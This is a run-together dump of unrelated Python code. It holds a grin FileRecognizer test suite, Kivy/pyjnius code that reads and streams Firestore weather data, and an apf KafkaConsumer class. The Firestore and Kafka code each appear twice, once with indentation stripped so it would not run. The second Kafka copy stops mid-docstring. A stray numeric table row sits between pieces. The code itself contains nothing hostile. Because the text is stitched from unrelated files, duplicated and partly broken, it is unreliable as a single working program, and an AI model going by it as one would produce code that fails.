from grin import FileRecognizer, GZIP_MAGIC
printerr = partial(print, file=sys.stderr)
ALL_BYTES = bytes(bytearray(range(256)))
def empty_file(filename, open=open):
open(filename, "a").close()
def binary_file(filename, open=open):
with open(filename, "wb") as f:
f.write(ALL_BYTES)
def text_file(filename, open=open):
lines = [b"foo\n", b"bar\n"] * 100
lines.append(b"baz\n")
lines.extend([b"foo\n", b"bar\n"] * 100)
with open(filename, "wb") as f:
f.writelines(lines)
def fake_gzip_file(filename, open=open):
""" Write out a binary file that has the gzip magic header bytes, but is not
a gzip file.
"""
with open(filename, "wb") as f:
f.write(GZIP_MAGIC)
f.write(ALL_BYTES)
def binary_middle(filename, open=open):
""" Write out a file that is text for the first 100 bytes, then 100 binary
bytes, then 100 text bytes to test that the recognizer only reads some of
the file.
"""
text = b"a" * 100 + b"\0" * 100 + b"b" * 100
f = open(filename, "wb")
f.write(text)
f.close()
def socket_file(filename):
s = socket.socket(socket.AF_UNIX)
s.bind(filename)
def unreadable_file(filename):
""" Write a file that does not have read permissions.
"""
text_file(filename)
os.chmod(filename, 0o200)
try:
with open(filename) as f:
pass
except IOError as e:
if "Permission denied" not in str(e):
raise
else:
raise RuntimeError(
"grin tests cannot run on a filesystem that doesn't support chmod(). "
"You will encounter false negative"
)
def unreadable_dir(filename):
""" Make a directory that does not have read permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o300)
def unexecutable_dir(filename):
""" Make a directory that does not have execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o600)
def totally_unusable_dir(filename):
""" Make a directory that has neither read nor execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o100)
def setup():
# Make sure we don't have files remaining from previous tests
teardown()
# Make files to test individual recognizers.
empty_file(b"empty")
binary_file(b"binary")
binary_middle(b"binary_middle")
text_file(b"text")
text_file(b"text~")
text_file(b"text#")
text_file(b"foo.bar.baz")
os.mkdir(b"dir")
binary_file(b".binary")
text_file(b".text")
empty_file(b"empty.gz", open=gzip.open)
binary_file(b"binary.gz", open=gzip.open)
text_file(b"text.gz", open=gzip.open)
binary_file(b".binary.gz", open=gzip.open)
text_file(b".text.gz", open=gzip.open)
fake_gzip_file("fake.gz")
os.mkdir(b".dir")
os.symlink(b"binary", b"binary_link")
os.symlink(b"text", b"text_link")
os.symlink(b"dir", b"dir_link")
os.symlink(b".binary", b".binary_link")
os.symlink(b".text", b".text_link")
os.symlink(b".dir", b".dir_link")
unreadable_file(b"unreadable_file")
unreadable_dir(b"unreadable_dir")
unexecutable_dir(b"unexecutable_dir")
totally_unusable_dir(b"totally_unusable_dir")
os.symlink(b"unreadable_file", b"unreadable_file_link")
os.symlink(b"unreadable_dir", b"unreadable_dir_link")
os.symlink(b"unexecutable_dir", b"unexecutable_dir_link")
os.symlink(b"totally_unusable_dir", b"totally_unusable_dir_link")
text_file(b"text.skip_ext")
os.mkdir(b"dir.skip_ext")
text_file(b"text.dont_skip_ext")
os.mkdir(b"skip_dir")
text_file(b"fake_skip_dir")
socket_file("socket_test")
# Make a directory tree to test tree-walking.
os.mkdir(b"tree")
os.mkdir(b"tree/.hidden_dir")
os.mkdir(b"tree/dir")
os.mkdir(b"tree/dir/subdir")
text_file(b"tree/dir/text")
text_file(b"tree/dir/subdir/text")
text_file(b"tree/text")
text_file(b"tree/text.skip_ext")
os.mkdir(b"tree/dir.skip_ext")
text_file(b"tree/dir.skip_ext/text")
text_file(b"tree/text.dont_skip_ext")
binary_file(b"tree/binary")
os.mkdir(b"tree/skip_dir")
text_file(b"tree/skip_dir/text")
os.mkdir(b"tree/.skip_hidden_dir")
text_file(b"tree/.skip_hidden_file")
os.mkdir(b"tree/unreadable_dir")
text_file(b"tree/unreadable_dir/text")
os.chmod("tree/unreadable_dir", 0o300)
os.mkdir(b"tree/unexecutable_dir")
text_file(b"tree/unexecutable_dir/text")
os.chmod(b"tree/unexecutable_dir", 0o600)
os.mkdir(b"tree/totally_unusable_dir")
text_file(b"tree/totally_unusable_dir/text")
os.chmod(b"tree/totally_unusable_dir", 0o100)
@contextlib.contextmanager
def catch_and_log_env_error(message=None, ignore="No such file or directory", args=()):
""" Catch IOError, print a message, optionnaly reraise. Ignore some types """
try:
yield
except EnvironmentError as e:
if ignore not in str(e):
if message is None:
raise e
printerr(message % (tuple(args) + (e,)))
def teardown():
files_to_delete = [
b"empty",
b"binary",
b"binary_middle",
b"text",
b"text~",
b"empty.gz",
b"binary.gz",
b"text.gz",
b"dir",
b"binary_link",
b"text_link",
b"dir_link",
b".binary",
b".text",
b".binary.gz",
b".text.gz",
b"fake.gz",
b".dir",
b".binary_link",
b".text_link",
b".dir_link",
b"unreadable_file",
b"unreadable_dir",
b"unexecutable_dir",
b"totally_unusable_dir",
b"unreadable_file_link",
b"unreadable_dir_link",
b"unexecutable_dir_link",
b"totally_unusable_dir_link",
b"text.skip_ext",
b"text.dont_skip_ext",
b"dir.skip_ext",
b"skip_dir",
b"fake_skip_dir",
b"text#",
b"foo.bar.baz",
b"tree",
b"socket_test"
]
for filename in files_to_delete:
with catch_and_log_env_error():
os.chmod(filename, 0o777)
if os.path.isdir(filename):
if not filename.startswith(b'/'):
# Make sure we have permission to delete everything
for dirname, dirs, files in os.walk(filename, followlinks=True):
paths = [os.path.join(dirname, p) for p in (dirs + files)]
os.chmod(dirname, 0o777)
for path in paths:
os.chmod(path, 0o777)
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
shutil.rmtree(filename)
else:
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
os.unlink(filename)
def test_binary():
fr = FileRecognizer()
assert fr.is_binary(b"binary")
assert fr.recognize_file(b"binary") == "binary"
assert fr.recognize(b"binary") == "binary"
def test_text():
fr = FileRecognizer()
assert not fr.is_binary(b"text")
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text") == "text"
def test_gzipped():
fr = FileRecognizer()
assert fr.is_binary(b"text.gz")
assert fr.recognize_file(b"text.gz") == "gzip"
assert fr.recognize(b"text.gz") == "gzip"
assert fr.is_binary(b"binary.gz")
assert fr.recognize_file(b"binary.gz") == "binary"
assert fr.recognize(b"binary.gz") == "binary"
assert fr.is_binary(b"fake.gz")
assert fr.recognize_file(b"fake.gz") == "binary"
assert fr.recognize(b"fake.gz") == "binary"
def test_binary_middle():
    """binary_bytes bounds how much of a file is scanned for binary bytes.

    The 'binary_middle' fixture presumably has its first binary byte at
    offset 100: scanning 100 bytes misses it (text), 101 finds it (binary)
    — TODO confirm against the setup code.
    """
    fr = FileRecognizer(binary_bytes=100)
    assert not fr.is_binary(b"binary_middle")
    assert fr.recognize_file(b"binary_middle") == "text"
    assert fr.recognize(b"binary_middle") == "text"
    fr = FileRecognizer(binary_bytes=101)
    assert fr.is_binary(b"binary_middle")
    assert fr.recognize_file(b"binary_middle") == "binary"
    assert fr.recognize(b"binary_middle") == "binary"
def test_socket():
    """A socket is not a regular file and is reported as 'skip'."""
    fr = FileRecognizer()
    assert fr.recognize(b"socket_test") == "skip"


def test_dir():
    """A directory is reported as 'directory'."""
    fr = FileRecognizer()
    assert fr.recognize_directory(b"dir") == "directory"
    assert fr.recognize(b"dir") == "directory"
def test_skip_symlinks():
    """With symlink skipping enabled, links of any target type are 'link'."""
    fr = FileRecognizer(skip_symlink_files=True, skip_symlink_dirs=True)
    assert fr.recognize(b"binary_link") == "link"
    assert fr.recognize_file(b"binary_link") == "link"
    assert fr.recognize(b"text_link") == "link"
    assert fr.recognize_file(b"text_link") == "link"
    assert fr.recognize(b"dir_link") == "link"
    assert fr.recognize_directory(b"dir_link") == "link"


def test_do_not_skip_symlinks():
    """With symlink skipping disabled, links classify as their targets."""
    fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
    assert fr.recognize(b"binary_link") == "binary"
    assert fr.recognize_file(b"binary_link") == "binary"
    assert fr.recognize(b"text_link") == "text"
    assert fr.recognize_file(b"text_link") == "text"
    assert fr.recognize(b"dir_link") == "directory"
    assert fr.recognize_directory(b"dir_link") == "directory"
def test_skip_hidden():
    """With hidden skipping on, every dot-prefixed entry reports 'skip',
    regardless of its actual content (binary/text/gzip/dir/link)."""
    fr = FileRecognizer(skip_hidden_files=True, skip_hidden_dirs=True)
    assert fr.recognize(b".binary") == "skip"
    assert fr.recognize_file(b".binary") == "skip"
    assert fr.recognize(b".text") == "skip"
    assert fr.recognize_file(b".text") == "skip"
    assert fr.recognize(b".dir") == "skip"
    assert fr.recognize_directory(b".dir") == "skip"
    assert fr.recognize(b".binary_link") == "skip"
    assert fr.recognize_file(b".binary_link") == "skip"
    assert fr.recognize(b".text_link") == "skip"
    assert fr.recognize_file(b".text_link") == "skip"
    assert fr.recognize(b".dir_link") == "skip"
    assert fr.recognize_directory(b".dir_link") == "skip"
    assert fr.recognize(b".text.gz") == "skip"
    assert fr.recognize_file(b".text.gz") == "skip"
    assert fr.recognize(b".binary.gz") == "skip"
    assert fr.recognize_file(b".binary.gz") == "skip"
def test_skip_backup():
    """Editor backup files (trailing ~) are skipped when requested."""
    fr = FileRecognizer(skip_backup_files=True)
    assert fr.recognize_file(b"text~") == "skip"


def test_do_not_skip_backup():
    """Backup files are classified normally when skipping is off."""
    fr = FileRecognizer(skip_backup_files=False)
    assert fr.recognize_file(b"text~") == "text"


def test_skip_weird_exts():
    """skip_exts matches literal name suffixes, including '#' and a
    multi-dot suffix like '.bar.baz'."""
    fr = FileRecognizer(skip_exts=set())
    assert fr.recognize_file(b"text#") == "text"
    assert fr.recognize_file(b"foo.bar.baz") == "text"
    fr = FileRecognizer(skip_exts=set([b"#", b".bar.baz"]))
    assert fr.recognize_file(b"text#") == "skip"
    assert fr.recognize_file(b"foo.bar.baz") == "skip"
def test_do_not_skip_hidden_or_symlinks():
    """With hidden AND symlink skipping off, dot entries classify purely
    by content, and dot-links classify as their targets."""
    fr = FileRecognizer(
        skip_hidden_files=False,
        skip_hidden_dirs=False,
        skip_symlink_dirs=False,
        skip_symlink_files=False,
    )
    assert fr.recognize(b".binary") == "binary"
    assert fr.recognize_file(b".binary") == "binary"
    assert fr.recognize(b".text") == "text"
    assert fr.recognize_file(b".text") == "text"
    assert fr.recognize(b".dir") == "directory"
    assert fr.recognize_directory(b".dir") == "directory"
    assert fr.recognize(b".binary_link") == "binary"
    assert fr.recognize_file(b".binary_link") == "binary"
    assert fr.recognize(b".text_link") == "text"
    assert fr.recognize_file(b".text_link") == "text"
    assert fr.recognize(b".dir_link") == "directory"
    assert fr.recognize_directory(b".dir_link") == "directory"
    assert fr.recognize(b".text.gz") == "gzip"
    assert fr.recognize_file(b".text.gz") == "gzip"
    assert fr.recognize(b".binary.gz") == "binary"
    assert fr.recognize_file(b".binary.gz") == "binary"


def test_do_not_skip_hidden_but_skip_symlinks():
    """With hidden skipping off but symlink skipping on, hidden regular
    entries classify by content while hidden links report 'link'."""
    fr = FileRecognizer(
        skip_hidden_files=False,
        skip_hidden_dirs=False,
        skip_symlink_dirs=True,
        skip_symlink_files=True,
    )
    assert fr.recognize(b".binary") == "binary"
    assert fr.recognize_file(b".binary") == "binary"
    assert fr.recognize(b".text") == "text"
    assert fr.recognize_file(b".text") == "text"
    assert fr.recognize(b".dir") == "directory"
    assert fr.recognize_directory(b".dir") == "directory"
    assert fr.recognize(b".binary_link") == "link"
    assert fr.recognize_file(b".binary_link") == "link"
    assert fr.recognize(b".text_link") == "link"
    assert fr.recognize_file(b".text_link") == "link"
    assert fr.recognize(b".dir_link") == "link"
    assert fr.recognize_directory(b".dir_link") == "link"
    assert fr.recognize(b".text.gz") == "gzip"
    assert fr.recognize_file(b".text.gz") == "gzip"
    assert fr.recognize(b".binary.gz") == "binary"
    assert fr.recognize_file(b".binary.gz") == "binary"
def test_lack_of_permissions():
    """Unreadable files report 'unreadable'; permission-restricted
    directories still report 'directory'."""
    fr = FileRecognizer()
    assert fr.recognize(b"unreadable_file") == "unreadable"
    assert fr.recognize_file(b"unreadable_file") == "unreadable"
    assert fr.recognize(b"unreadable_dir") == "directory"
    assert fr.recognize_directory(b"unreadable_dir") == "directory"
    assert fr.recognize(b"unexecutable_dir") == "directory"
    assert fr.recognize_directory(b"unexecutable_dir") == "directory"
    assert fr.recognize(b"totally_unusable_dir") == "directory"
    assert fr.recognize_directory(b"totally_unusable_dir") == "directory"


def test_symlink_src_unreadable():
    """Followed links to permission-restricted targets behave exactly like
    the targets themselves."""
    fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
    assert fr.recognize(b"unreadable_file_link") == "unreadable"
    assert fr.recognize_file(b"unreadable_file_link") == "unreadable"
    assert fr.recognize(b"unreadable_dir_link") == "directory"
    assert fr.recognize_directory(b"unreadable_dir_link") == "directory"
    assert fr.recognize(b"unexecutable_dir_link") == "directory"
    assert fr.recognize_directory(b"unexecutable_dir_link") == "directory"
    assert fr.recognize(b"totally_unusable_dir_link") == "directory"
    assert fr.recognize_directory(b"totally_unusable_dir_link") == "directory"
def test_skip_ext():
    """skip_exts applies to files only; a directory with a skipped
    extension is still a 'directory'."""
    fr = FileRecognizer(skip_exts=set([b".skip_ext"]))
    assert fr.recognize(b"text.skip_ext") == "skip"
    assert fr.recognize_file(b"text.skip_ext") == "skip"
    assert fr.recognize(b"text") == "text"
    assert fr.recognize_file(b"text") == "text"
    assert fr.recognize(b"text.dont_skip_ext") == "text"
    assert fr.recognize_file(b"text.dont_skip_ext") == "text"
    assert fr.recognize(b"dir.skip_ext") == "directory"
    assert fr.recognize_directory(b"dir.skip_ext") == "directory"


def test_skip_dir():
    """skip_dirs matches directories by name; a regular file with the same
    name is classified normally."""
    fr = FileRecognizer(skip_dirs=set([b"skip_dir", b"fake_skip_dir"]))
    assert fr.recognize(b"skip_dir") == "skip"
    assert fr.recognize_directory(b"skip_dir") == "skip"
    assert fr.recognize(b"fake_skip_dir") == "text"
    assert fr.recognize_file(b"fake_skip_dir") == "text"
def test_walking():
    """walk() yields (path, kind) pairs for recognized files under a tree,
    honoring hidden/extension/directory skip settings.

    Note that skip_exts only filters files: the contents of the directory
    'tree/dir.skip_ext' are still walked.
    """
    fr = FileRecognizer(
        skip_hidden_files=True,
        skip_hidden_dirs=True,
        skip_exts=set([b".skip_ext"]),
        skip_dirs=set([b"skip_dir"]),
    )
    truth = [
        (b"tree/binary", "binary"),
        (b"tree/dir.skip_ext/text", "text"),
        (b"tree/dir/subdir/text", "text"),
        (b"tree/dir/text", "text"),
        (b"tree/text", "text"),
        (b"tree/text.dont_skip_ext", "text"),
    ]
    # walk() order is not asserted; sort both for a stable comparison.
    result = sorted(fr.walk(b"tree"))
    assert result == truth
def predot():
    """Setup: run the next test from inside the fixture tree."""
    os.chdir(b"tree")


def postdot():
    """Teardown: return to the original working directory."""
    os.chdir(b"..")


@nose.with_setup(predot, postdot)
def test_dot():
    """walk(b'.') yields the same tree as test_walking, with paths
    expressed relative to '.'."""
    fr = FileRecognizer(
        skip_hidden_files=True,
        skip_hidden_dirs=True,
        skip_exts=set([b".skip_ext"]),
        skip_dirs=set([b"skip_dir"]),
    )
    truth = [
        (b"./binary", "binary"),
        (b"./dir.skip_ext/text", "text"),
        (b"./dir/subdir/text", "text"),
        (b"./dir/text", "text"),
        (b"./text", "text"),
        (b"./text.dont_skip_ext", "text"),
    ]
    result = sorted(fr.walk(b"."))
    assert result == truth
def predotdot():
    """Setup: descend two levels so the fixture tree is at '..'."""
    os.chdir(b"tree")
    os.chdir(b"dir")


def postdotdot():
    """Teardown: climb back to the original working directory."""
    os.chdir(b"..")
    os.chdir(b"..")
@nose.with_setup(predotdot, postdotdot)
def test_dot_dot():
    """walk(b'..') yields the fixture tree with paths expressed relative
    to the parent directory."""
    fr = FileRecognizer(
        skip_hidden_files=True,
        skip_hidden_dirs=True,
        skip_exts=set([b".skip_ext"]),
        skip_dirs=set([b"skip_dir"]),
    )
    truth = [
        (b"../binary", "binary"),
        (b"../dir.skip_ext/text", "text"),
        (b"../dir/subdir/text", "text"),
        (b"../dir/text", "text"),
        (b"../text", "text"),
        (b"../text.dont_skip_ext", "text"),
    ]
    result = sorted(fr.walk(b".."))
    assert result == truth
from kivy.app import App
from jnius import autoclass, cast, PythonJavaClass, java_method

# Resolve the Android/Java classes needed to reach Firebase Firestore
# through pyjnius.
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
context = cast('android.content.Context', currentActivity.getApplicationContext())
FirebaseApp = autoclass('com.google.firebase.FirebaseApp')
FirebaseFirestore = autoclass('com.google.firebase.firestore.FirebaseFirestore')
HashMap = autoclass('java.util.HashMap')

# Initialise Firebase for the app context and keep one Firestore handle.
FirebaseApp.initializeApp(context)
instance = FirebaseFirestore.getInstance()
# NOTE(review): evaluated at import time — assumes the Kivy app is already
# running, otherwise App.get_running_app() returns None. Confirm import order.
APP_INSTANCE = App.get_running_app()
# writing
def write_weather_data():
    """Write a fixed sample weather document to Firestore at weather/today."""
    payload = HashMap()
    # Fill the Java map field by field (pyjnius has no dict -> HashMap bridge).
    for field, value in (
        ("temperature", 25),
        ("sky", "cloudy"),
        ("wind_speed", 11.5),
        ("wind_speed_unit", "km"),
    ):
        payload.put(field, value)
    instance.collection("weather").document("today").set(payload)
def read_weather_data():
    """Fetch weather/today once; the result arrives via TodaySuccessListener."""
    doc_ref = instance.collection("weather").document("today")
    doc_ref.get().addOnSuccessListener(TodaySuccessListener())
class TodaySuccessListener(PythonJavaClass):
    """pyjnius OnSuccessListener for a one-shot Firestore document get()."""

    __javainterfaces__ = ['com/google/android/gms/tasks/OnSuccessListener']
    # Include line or this exception happens:
    # jnius.jnius.JavaException: JVM exception occurred: interface
    # com.google.android.gms.tasks.OnCompleteListener is not visible from
    # class loader java.lang.IllegalArgumentException
    __javacontext__ = "app"

    # You get "ValueError: need more than 1 value to unpack" if you don't
    # add the ';' inside the JNI signature string:
    # https://github.com/kivy/pyjnius/blob/master/jnius/jnius_utils.pxi#L43
    @java_method('(Ljava/lang/Object;)V')
    def onSuccess(self, doc):
        # doc is the fetched snapshot; mirror all its fields into the
        # running app's weather_data mapping.
        data = doc.getData()
        for key in data.keySet():
            APP_INSTANCE.weather_data[key] = data.get(key)
# Registration handle for the active weather/today snapshot listener.
# None means "not currently listening".
today_listener = None


def stream_weather_data():
    """Attach a realtime snapshot listener to weather/today (idempotent)."""
    global today_listener
    todayRef = instance.collection("weather").document("today")
    if today_listener is None:
        today_listener = todayRef.addSnapshotListener(TodaySnapshotStream())


def remove_listener_of_weather_data():
    """Detach the snapshot listener, allowing a later re-attach.

    Bug fix: reset today_listener to None after remove(); previously the
    stale handle made stream_weather_data() refuse to ever re-subscribe.
    """
    global today_listener
    if today_listener is not None:
        today_listener.remove()
        today_listener = None
class TodaySnapshotStream(PythonJavaClass):
    """pyjnius EventListener receiving live snapshots of weather/today."""

    __javainterfaces__ = ['com/google/firebase/firestore/EventListener']
    __javacontext__ = "app"

    # java/lang/Object is used for the snapshot parameter; the concrete
    # type is com/google/firebase/firestore/DocumentSnapshot.
    @java_method('(Ljava/lang/Object;Lcom/google/firebase/firestore/FirebaseFirestoreException;)V')
    def onEvent(self, doc, error):
        # Firestore reports stream failures through `error`; in that case
        # `doc` may be null, so bail out instead of dereferencing it.
        # (Previously `error` was ignored and getData() raised inside the
        # try, masking the real failure.)
        if error is not None:
            print(error)
            return
        try:
            data = doc.getData()
            for key in data.keySet():
                APP_INSTANCE.weather_data[key] = data.get(key)
            print(APP_INSTANCE.weather_data)
        except Exception as e:
            # Best-effort: log and keep the stream alive.
            print(e)
from jnius import autoclass, cast, PythonJavaClass, java_method
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
context = cast('android.content.Context', currentActivity.getApplicationContext())
FirebaseApp = autoclass('com.google.firebase.FirebaseApp')
FirebaseFirestore = autoclass('com.google.firebase.firestore.FirebaseFirestore')
HashMap = autoclass('java.util.HashMap')
FirebaseApp.initializeApp(context)
instance = FirebaseFirestore.getInstance()
APP_INSTANCE = App.get_running_app()
# writing
def write_weather_data():
myMap = HashMap()
myMap.put("temperature", 25)
myMap.put("sky", "cloudy")
myMap.put("wind_speed", 11.5)
myMap.put("wind_speed_unit", "km")
instance.collection("weather").document("today").set(myMap)
def read_weather_data():
task = instance.collection("weather").document("today").get()
task.addOnSuccessListener(TodaySuccessListener())
class TodaySuccessListener(PythonJavaClass):
__javainterfaces__ = ['com/google/android/gms/tasks/OnSuccessListener']
# Include line or this exception happens
# jnius.jnius.JavaException: JVM exception occurred: interface com.google.android.gms.tasks.OnCompleteListener is not visible from class loader java.lang.IllegalArgumentException
__javacontext__ = "app"
# You get "ValueError: need more than 1 value to unpack" <- if you dont add ;
# https://github.com/kivy/pyjnius/blob/master/jnius/jnius_utils.pxi#L43
@java_method('(Ljava/lang/Object;)V')
def onSuccess(self, doc):
data = doc.getData()
for key in data.keySet():
APP_INSTANCE.weather_data[key] = data.get(key)
today_listener = None
def stream_weather_data():
global today_listener
todayRef = instance.collection("weather").document("today")
if today_listener is None:
today_listener = todayRef.addSnapshotListener(TodaySnapshotStream())
def remove_listener_of_weather_data():
global today_listener
if today_listener is not None:
today_listener.remove()
class TodaySnapshotStream(PythonJavaClass):
__javainterfaces__ = ['com/google/firebase/firestore/EventListener']
__javacontext__ = "app"
# I'm using java/lang/Object though if you want to be specific, you can use
# com/google/firebase/firestore/DocumentSnapshot
@java_method('(Ljava/lang/Object;Lcom/google/firebase/firestore/FirebaseFirestoreException;)V')
def onEvent(self, doc, error):
try:
data = doc.getData()
for key in data.keySet():
APP_INSTANCE.weather_data[key] = data.get(key)
print(APP_INSTANCE.weather_data)
except Exception as e:
print(e) | 0.508788 | 0.062991 |
from apf.consumers.generic import GenericConsumer
from confluent_kafka import Consumer, KafkaException
import fastavro
import io
import importlib
class KafkaConsumer(GenericConsumer):
    """Consume from a Kafka Topic.

    By default :class:`KafkaConsumer` uses a manual commit strategy to avoid
    data loss on errors. This strategy can be disabled completely by adding
    ``"COMMIT": False`` to the ``STEP_CONFIG`` variable in the step's
    ``settings.py`` file; this can be useful for step testing because Kafka
    doesn't save the messages that already were processed.

    **Example:**

    .. code-block:: python

        #settings.py
        STEP_CONFIG = { ...
            "COMMIT": False  #Disable commit
                             #useful for testing/debugging.
        }

    Parameters
    -----------
    TOPICS: list
        List of topics to consume.

        **Example:**

        Subscribe to a fixed list of topics:

        .. code-block:: python

            #settings.py
            CONSUMER_CONFIG = { ...
                "TOPICS": ["topic1", "topic2"]
            }

        Using `confluent_kafka` syntax we can subscribe to a pattern

        .. code-block:: python

            #settings.py
            CONSUMER_CONFIG = { ...
                "TOPICS": ["^topic*"]
            }

        More on pattern subscribe
        `here <http://docs.confluent.io/current/clients/confluent-kafka-python/#confluent_kafka.Consumer.subscribe>`_

    TOPIC_STRATEGY: dict
        Parameters to configure a topic strategy instead of a fixed topic list.

        The required parameters are:

        - *CLASS*: `apf.core.topic_management.GenericTopicStrategy` class to be used.
        - *PARAMS*: Parameters passed to *CLASS* object.

        **Example:**

        A topic strategy that updates on 23 hours UTC every day.

        .. code-block:: python

            #settings.py
            CONSUMER_CONFIG = { ...
                "TOPIC_STRATEGY": {
                    "CLASS": "apf.core.topic_management."+\\
                             "DailyTopicStrategy",
                    "PARAMS": {
                        "topic_format": [
                            "ztf_%s_programid1",
                            "ztf_%s_programid3"
                        ],
                        "date_format": "%Y%m%d",
                        "change_hour": 23,
                        "retention_days": 8,
                    }
                }
            }

    PARAMS: dict
        Parameters passed to :class:`confluent_kafka.Consumer`

        The required parameters are:

        - *bootstrap.servers*: comma separated <host:port> :py:class:`str` to brokers.
        - *group.id*: :py:class:`str` with consumer group name.

        **Example:**

        Configure a Kafka Consumer to a secure Kafka Cluster

        .. code-block:: python

            #settings.py
            CONSUMER_CONFIG = { ...
                "PARAMS": {
                    "bootstrap.servers": "kafka1:9093,kafka2:9093",
                    "group.id": "step_group",
                    'security.protocol': 'SSL',
                    'ssl.ca.location': '<ca-cert path>',
                    'ssl.keystore.location': '<keystore path>',
                    'ssl.keystore.password': '<<PASSWORD>>'
                }
            }

        all supported `confluent_kafka` parameters can be found
        `here <https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md>`_
    """

    def __init__(self, config):
        super().__init__(config)
        # Disable auto commit: offsets are committed explicitly in commit()
        # so a failing step does not silently acknowledge unprocessed data.
        self.config["PARAMS"]["enable.auto.commit"] = False
        # Creating consumer
        self.consumer = Consumer(self.config["PARAMS"])
        self.max_retries = int(self.config.get("COMMIT_RETRY", 5))
        self.logger.info(
            f"Creating consumer for {self.config['PARAMS'].get('bootstrap.servers')}"
        )
        self.dynamic_topic = False
        if self.config.get("TOPICS"):
            self.logger.info(f'Subscribing to {self.config["TOPICS"]}')
            self.consumer.subscribe(self.config["TOPICS"])
        elif self.config.get("TOPIC_STRATEGY"):
            self.dynamic_topic = True
            # "package.module.Class" -> import module, fetch Class.
            module_name, class_name = self.config["TOPIC_STRATEGY"]["CLASS"].rsplit(
                ".", 1
            )
            TopicStrategy = getattr(importlib.import_module(module_name), class_name)
            self.topic_strategy = TopicStrategy(
                **self.config["TOPIC_STRATEGY"]["PARAMS"]
            )
            self.topics = self.topic_strategy.get_topics()
            self.logger.info(f'Using {self.config["TOPIC_STRATEGY"]}')
            self.logger.info(f"Subscribing to {self.topics}")
            self.consumer.subscribe(self.topics)
        else:
            # Typo fix: message previously read "No topics o topic strategy set. "
            raise Exception("No topics or topic strategy set.")

    def __del__(self):
        # Best-effort close; __del__ may run during interpreter shutdown.
        self.logger.info("Shutting down Consumer")
        if hasattr(self, "consumer"):
            self.consumer.close()

    def _deserialize_message(self, message):
        """Decode one Avro-encoded Kafka message; returns its first record."""
        bytes_io = io.BytesIO(message.value())
        reader = fastavro.reader(bytes_io)
        # Fix: use the iterator protocol — the Py2-style reader.next() is
        # not part of fastavro's public reader API.
        data = next(reader)
        return data

    def _check_topics(self):
        """Return True when the topic strategy now yields different topics."""
        topics = self.topic_strategy.get_topics()
        if topics != self.topics:
            return True
        return False

    def _subscribe_to_new_topics(self):
        """Re-subscribe the consumer to the strategy's current topic set."""
        self.topics = self.topic_strategy.get_topics()
        self.consumer.unsubscribe()
        self.logger.info(f"Subscribing to {self.topics}")
        self.consumer.subscribe(self.topics)

    def set_basic_config(self, num_messages, timeout):
        """Override num_messages/timeout with configured values, if any.

        "consume.messages"/"consume.timeout" take precedence over the
        legacy "NUM_MESSAGES"/"TIMEOUT" keys.
        """
        if "consume.messages" in self.config:
            num_messages = self.config["consume.messages"]
        elif "NUM_MESSAGES" in self.config:
            num_messages = self.config["NUM_MESSAGES"]
        if "consume.timeout" in self.config:
            timeout = self.config["consume.timeout"]
        elif "TIMEOUT" in self.config:
            timeout = self.config["TIMEOUT"]
        return num_messages, timeout

    def consume(self, num_messages=1, timeout=60):
        """Generator yielding deserialized messages from the subscribed topics.

        Yields a single dict when ``num_messages == 1``, otherwise a list of
        dicts. Stops (returns) on partition EOF. The raw messages of the
        last consumed batch are kept in ``self.messages`` so ``commit()``
        can acknowledge them.

        Parameters
        --------------
        num_messages: int
            Number of messages to be consumed per batch.
        timeout: int
            Seconds to wait for a batch before polling again.
        """
        num_messages, timeout = self.set_basic_config(num_messages, timeout)
        messages = []
        while True:
            # With a topic strategy, re-check on every poll whether the
            # active topic set has rolled over (e.g. daily topics).
            if self.dynamic_topic:
                if self._check_topics():
                    self._subscribe_to_new_topics()
            messages = self.consumer.consume(num_messages=num_messages, timeout=timeout)
            if len(messages) == 0:
                continue
            deserialized = []
            for message in messages:
                if message.error():
                    if message.error().name() == "_PARTITION_EOF":
                        self.logger.info("PARTITION_EOF: No more messages")
                        return
                    self.logger.exception(f"Error in kafka stream: {message.error()}")
                    continue
                else:
                    message = self._deserialize_message(message)
                    deserialized.append(message)
            # Keep the raw batch so commit() can acknowledge these offsets.
            self.messages = messages
            messages = []
            if len(deserialized) > 0:
                if num_messages == 1:
                    yield deserialized[0]
                else:
                    yield deserialized

    def commit(self):
        """Synchronously commit offsets, retrying up to COMMIT_RETRY times."""
        retries = 0
        commited = False
        while not commited:
            try:
                self.consumer.commit(asynchronous=False)
                commited = True
            except KafkaException:
                retries += 1
                # Re-raise the last error once retries are exhausted
                # (bare raise preserves the original traceback).
                if retries == self.max_retries:
                    raise
from confluent_kafka import Consumer, KafkaException
import fastavro
import io
import importlib
class KafkaConsumer(GenericConsumer):
"""Consume from a Kafka Topic.
By default :class:`KafkaConsumer` uses a manual commit strategy to avoid data loss on errors.
This strategy can be disabled completly adding `"COMMIT":False` to the `STEP_CONFIG` variable
in the step's `settings.py` file, this can be useful for step testing because Kafka doesn't save
the messages that already were processed.
**Example:**
.. code-block:: python
#settings.py
STEP_CONFIG = { ...
"COMMIT": False #Disable commit
#useful for testing/debugging.
}
Parameters
-----------
TOPICS: list
List of topics to consume.
**Example:**
Subscribe to a fixed list of topics:
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPICS": ["topic1", "topic2"]
}
Using `confluent_kafka` syntax we can subscribe to a pattern
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPICS": ["^topic*"]
}
More on pattern subscribe
`here <http://docs.confluent.io/current/clients/confluent-kafka-python/#confluent_kafka.Consumer.subscribe>`_
TOPIC_STRATEGY: dict
Parameters to configure a topic strategy instead of a fixed topic list.
The required parameters are:
- *CLASS*: `apf.core.topic_management.GenericTopicStrategy` class to be used.
- *PARAMS*: Parameters passed to *CLASS* object.
**Example:**
A topic strategy that updates on 23 hours UTC every day.
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"TOPIC_STRATEGY": {
"CLASS": "apf.core.topic_management"+\\
